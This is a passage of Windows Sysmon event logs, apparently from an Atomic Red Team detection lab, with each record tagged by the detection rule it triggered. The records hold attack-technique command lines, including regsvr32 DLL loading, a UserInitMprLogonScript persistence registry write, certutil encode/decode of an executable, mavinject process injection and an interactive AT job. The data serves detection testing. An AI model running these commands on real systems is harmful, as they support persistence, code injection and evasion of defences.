Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ProcessId":5828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.867"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4045,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:46.893188Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ParentProcessId":5828,"ProcessGuid":"747F3D96-D97B-5D31-0000-00109DEB3800","ProcessId":5788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:47.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4047,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:47.083068Z"}},"Version":5}}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ProcessId":4240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:54.968"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4049,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:54.976854Z"}},"Version":5}}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ParentProcessId":4240,"ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:55.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4050,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:55.018275Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","Logon Scripts (UserInitMprLogonScript) Registry","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\UserInitMprLogonScript","UtcTime":"2019-07-19 14:54:01.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4051,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:54:01.925833Z"}},"Version":2}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ProcessId":4832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4061,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.235828Z"}},"Version":5}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil.exe -encode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ParentProcessId":4832,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00109E193C00","ProcessId":1260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4062,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.309488Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ProcessId":4020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4063,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.961276Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil.exe -decode file.txt c:\\file.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ParentProcessId":4020,"ProcessGuid":"747F3D96-DA3F-5D31-0000-001022323C00","ProcessId":6888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.818"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4064,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.974754Z"}},"Version":5}}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ProcessId":6572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4066,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.270645Z"}},"Version":5}}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /c copy C:\\Windows\\\\system32\\\\certutil.exe C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %windir%\\\\system32\\\\certutil.exe %temp%tcm.tmp\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ParentProcessId":6572,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010B1553C00","ProcessId":5168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.256"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4067,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.294575Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.316"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4068,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.333864Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %temp%tcm.tmp -decode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ParentProcessId":4336,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ProcessId":3932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4069,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.361122Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ParentProcessId":3932,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010AB5F3C00","ProcessId":6260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.381"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4070,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.412850Z"}},"Version":5}}}},{"detection":["MavInject Process Injection"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\mavinject.exe\" 3912 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft Application Virtualization Injector","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A","Image":"C:\\Windows\\System32\\mavinject.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA4B-5D31-0000-0010CB413D00","ProcessId":2604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:15.754"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4078,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:15.776993Z"}},"Version":5}}}},{"detection":["Interactive AT Job"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"at 13:20 /interactive cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Schedule service command line interface","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD","Image":"C:\\Windows\\System32\\at.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"at 13:20 /interactive 